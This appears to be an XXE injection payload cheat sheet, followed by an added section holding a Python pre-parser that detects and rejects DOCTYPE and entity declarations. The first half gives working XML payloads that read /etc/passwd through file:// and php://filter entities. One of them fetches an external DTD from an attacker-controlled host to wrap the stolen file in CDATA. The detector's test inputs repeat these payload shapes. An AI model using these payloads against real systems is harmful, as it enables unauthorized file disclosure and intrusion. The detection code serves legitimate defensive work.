# XXE Injection
## Payloads
### Test for injection

```xml
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>
```
### File retrieval

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<container><value>&xxe;</value></container>
```
### File retrieval with base64 encoding

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<container><value>&xxe;</value></container>
```
### File retrieval without breaking XML / causing an error

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://<ip address>/wrapper.dtd" >
%dtd;
]>
<document>
<lastName>&wrapper;</lastName>
<firstName>Larry</firstName>
</document>
```
Serve `wrapper.dtd` on an attacker controlled machine, containing:

```xml
<!ENTITY wrapper "%start;%file;%end;">
```

The wrapper has to live in the external DTD because parameter-entity references are not permitted inside markup declarations in the internal subset.
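Defender's counterpart to the payloads above, added here and not part of the original page: a Python pre-parser built on the standard library's expat binding that records every DOCTYPE and entity declaration these payloads depend on (internal, external SYSTEM, parameter) and refuses to parse the document when any is present. The sample documents in the block are constructed from the payload shapes on this page; the DTD host name in them is a placeholder.

```python
# Added example, not from the original page; sample XML below is constructed.
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXML(ValueError):
    """Document carries a DOCTYPE or entity declaration."""


def scan_xml(data: bytes) -> list:
    """Report DTD constructs in `data` without resolving any of them.

    Expat never fetches external resources on its own and parameter-entity
    parsing is disabled, so the scan cannot trigger the file:// or http://
    access the payloads aim for; it only records what they declare.
    """
    findings = []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append("doctype:%s" % name)

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter-entity" if is_param else "general-entity"
        if sysid is not None:  # SYSTEM/PUBLIC id: external (file://, http://, php://)
            findings.append("%s:%s:external:%s" % (kind, name, sysid))
        else:
            findings.append("%s:%s:internal" % (kind, name))

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    try:
        p.Parse(data, True)
    except expat.ExpatError as exc:  # malformed input is a finding, not a pass
        findings.append("parse-error:%s" % exc)
    return findings


def parse_safely(data: bytes) -> str:
    """Parse `data` only when scan_xml() found nothing; return the root tag."""
    findings = scan_xml(data)
    if findings:
        raise UnsafeXML("; ".join(findings))
    return ET.fromstring(data).tag


# Constructed inputs: a clean document and two payload shapes from this page.
BENIGN = b'<?xml version="1.0"?><userInfo><firstName>John</firstName></userInfo>'
FILE_READ = (b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM '
             b'"file:///etc/passwd"> ]><container><value>&xxe;</value></container>')
CDATA_WRAPPER = (b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY % start "<![CDATA[">'
                 b'<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % end "]]>">'
                 b'<!ENTITY % dtd SYSTEM "http://dtd-host.invalid/wrapper.dtd">%dtd;]>'
                 b'<document><lastName>&wrapper;</lastName></document>')
```

Rejecting any DOCTYPE at all is the simplest robust policy: none of the payloads above work without one, and legitimate API payloads rarely need an inline DTD.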